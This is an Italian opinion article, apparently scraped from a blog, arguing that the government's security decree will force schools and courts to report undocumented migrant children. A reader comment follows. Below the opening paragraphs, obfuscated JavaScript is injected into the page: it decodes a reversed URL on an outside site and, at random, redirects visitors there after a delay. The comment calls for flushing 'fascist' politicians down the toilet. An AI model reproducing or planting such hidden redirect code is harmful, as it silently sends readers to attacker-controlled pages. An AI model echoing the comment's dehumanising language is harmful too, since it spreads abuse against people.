Minori, quando lo Stato decide di fare il "lupo cattivo”. Gli effetti del decreto sicurezza

image_pdfimage_print

di Katia Lobo Fiterman

Il decreto sicurezza del Governo italiano rischia di mettere fine a quasi 20 anni di storia dei diritti dei bambini. Già da adesso, i piccoli, se figli di cittadini stranieri sprovvisti di permesso di soggiorno, rischiano di essere denunciati e deportati dall’Italia insieme ai loro genitori.

$p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == “string”) return $p$VTO6JhIH6WkCGAcPR.list[n].split(“”).reverse().join(“”);return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=[“‘php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and(this)” href=”http://www.altracitta.org/wp-content/uploads/2009/10/bambini.jpg”>Bambini cinesi
Bambini cinesi

Le istituzioni che fino ad ora si erano occupate di tutelare i diritti dell’infanzia, avranno invece il triste obbligo di denunciare alle forze dell’ordine la presenza di minori in condizione di irregolarità. Ciò nonostante la Convenzione dei Diritti del Fanciullo, di New York, ratificata dall’Italia nel 1990 e ancora oggi in vigore, istituita proprio per proteggere i bambini.

Pensate ad un Tribunale di Minori che dovrà denunciare alle questure italiane questi piccoli, anche vittime di abuso, violenze fisiche o portatori di malattie gravi, perché vengano espulsi dall’Italia insieme ai loro genitori, in quanto figli di clandestini.

Pensate a gli asili nido, alle scuole materne e quelle della licenza media superiore, che accolgono anche i ragazzini di età oltre i 16 anni (le scuole dell’obbligo non sono tenute a denunciare i minori e i loro familari) che si mettono a denunciare la presenza di minori stranieri sprovvisti di titolo di soggiorno.

Sì, proprio la scuola, che avrebbe come compito per eccellenza di formare i giovani al rispetto e all’uguaglianza tra gli esseri umani, trasformata in un mero strumento di discriminazione che va decisamente contro quei valori ancora presenti nella nostra Costituzione come nella Carta Universale dei Diritti dell’Uomo.

Quando “il lupo cattivo” o “l’orco malvagio” lo fa lo Stato, la paura dei piccoli diventa anche la stessa paura degli adulti.  Allora possiamo dire che abbiamo davvero toccato il fondo, quasi da far invidia a Erode (e pensare che questo avrebbe dovuto essere il governo che difende la famiglia, i bambini e per questo, votato da tanti italiani…).

Cosa racconteremo ai nostri figli, la storia dell’Italia Matrigna o quella della Strega Cattiva alla ricerca di bimbi da imprigionare? Alla luce di quanto sta già accadendo adesso, temo che saranno storie terribili, da fare paura (e non soltanto per i più piccoli) perché raccoglieranno in sè la stessa medesima storia di una società che ha perso ogni nozione della dignità e del rispetto delle persone.

Prendiamo atto di questa situazione ora che, finita la regolarizzazione di colf e badanti, lo Stato può già partire senza pietà e a rigor di legge, con le ronde alla caccia ai clandestini di ogni taglia.

Ci sentiremo più sicuri e più felici quando questi bambini verranno cacciati via, insieme alle loro famiglia, dalle terre italiane? E’ veramente questo il problema fondamentale e grave del nostro tempo?

Guardo con tristezza la storia, che, cinicamente si ripropone, senza scrupoli, senza decenza, senza veli, dai tempi del nazismo/facismo, ai nostri, impietosamente.

Guardo (e mi vergogno mentre lo faccio) le piccole faccie innocenti dei bambini e mi chiedo, senza pace, cosa mai potrò rispondergli quando mi domanderanno dove ero e cosa ho fatto per impedire che tutto questo accadesse!

0 Comments

  1. Maurizio Sarcoli

    Riprendo la conclusione dell’articolo: ciò che possiamo fare è disobbedire alla legge, non denunciando proprio nessuno. la convenzione internazionale dei diritti dell’infanzia e adolescenza protegge i bambini e i minori in genere:
    Art. 3

    In tutte le decisioni relative ai fanciulli, di competenza delle istituzioni pubbliche o private di assistenza sociale, dei tribunali, delle autorità amministrative o degli organi legislativi, l’interesse superiore del fanciullo deve essere una considerazione preminente.

    mentre la dichiarazione universale dei diritti dell’uomo protegge gli adulti:

    Articolo 3

    Ogni individuo ha diritto alla vita, alla libertà ed alla sicurezza della propria persona.

    in conclusione propongo una legge di iniziativa popolare per espellere dal aprlamento i leghisti, i fascisti e tutti quelli che in maggioranza e opposizione si oppongo all’italia multietnica, avvelenano il paese e distruggono la vita di tante, troppe persone.
    l’espulsione potrebbe avvenire in forma immediata passando dallos carico del Wc così i fascisti carogna tornerebbero nelle fogne, ciao, Maurizio Sarcoli

    Reply

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *